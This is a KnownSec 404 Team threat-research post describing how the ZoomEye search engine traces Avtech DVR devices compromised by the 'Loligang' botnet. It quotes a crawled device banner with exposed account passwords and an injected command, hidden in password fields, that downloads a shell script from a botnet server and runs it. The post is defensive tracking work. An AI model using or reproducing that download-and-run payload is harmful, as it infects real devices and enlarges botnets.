A case of tracking botnet using ZoomEye

by Heige(a.k.a Superhei) of KnownSec 404 Team 07/04/2019

Recently, the Tencent Threat Intelligence Center released a report https://paper.seebug.org/974/ (Chinese) about the IOC analysis of the “Loligang” botnet.The addresses of the two botnet download servers are mentioned in this article:

http[:]/103.30.43.120:99
http[:]/222.186.52.155:21541

It is worth mentioning that both of them use the HFS server. According to previous research experience, HFS servers are often used as download servers for malicious files and This can be verified by ZoomEye’s search results. HFS servers‘s ZoomEye dork: https://www.zoomeye.org/searchResult?q=%22Server%3A%20HFS%22 But as the botnet owner enabled the less commonly used ports, such as the port 99/21541 used by the two addresses above, these ports cause some common search engines to not fully cover them.

When I tried to search for these two IP addresses using ZoomEye, I found some interesting data.

https://www.zoomeye.org/searchResult?q=103.30.43.120%20-ip%3A103.30.43.120 About 794 results
https://www.zoomeye.org/searchResult?q=222.186.52.155%20-ip%3A222.186.52.155 About 3,152 results

and the banner data:

HTTP/1.1 200 OK
Date: Thu, 04 Jul 2019 16:11:40 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Wed, 26 Jun 2019 13:07:09 GMT
Content-Type: text/plain
ETag: 37-2410-1561554429
Content-Length: 2410

<Account>
<Maxuser Level="40/40">10</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">260879jimi</Password>
<Level Level="40/40">SUPERVISOR</Level>
<Lifetime Level="40/40">INFINITE</Lifetime>
<PhoneNum1 Level="40/40" />
<PhoneNum2 Level="40/40" />
<PhoneNum3 Level="40/40" />
<IDCode Level="" />
</User1>
<User2>
<Username Level="40/40" Dispatch="account">eddy</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User3>
<Username Level="40/40" Dispatch="account">user</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">maxposts</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
<User5>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User5>
<User6>
<Username Level="40/40" Dispatch="account">xqmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User6>
</Account>

Ok, we found a lot of target IPs that were attacked and became part of the botnet.From the characteristics of the banner data “Server: Linux/2.x UPnP/1.0 Avtech/1.0”, Obviously all AVTECH {DVR/NVR/IPC}. It is obvious that the exploits used to attack the traces of these avtech devices and were crawled by ZoomEye’s crawler. These vulnerabilities can be found through the SeeBug vulnerability Database : https://www.seebug.org/search/?keywords=avtech

So we can track the download servers of these botnets through the traces of these exploits. In fact, we are not using this technique for the first time. In fact, we are not using this technique for the first time. In May 2018 we used this technique to track the exploits of the GPON Home Gateway RCE vulnerability : https://paper.seebug.org/595/ (Chinese)

Let’s try the effect. In order to eliminate the interference, I chose two keywords: wget +SUPERVISOR

https://www.zoomeye.org/searchResult?q=wget%20%2BSUPERVISOR

Export the data and analyze it to get the following results

From this result, these botnets are still very fresh and because these ip devices may be repeatedly attacked by vulnerabilities, there may be multiple records in the banner data. The more records, the more the botnet is actively active.

At the end,This case demonstrates that the method of tracking botnets through the traces of vulnerability exploits and cyberspace search engines is effective.

Thanks to Zhutq of the knownsec 404 team

contact me https://twitter.com/80vul

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)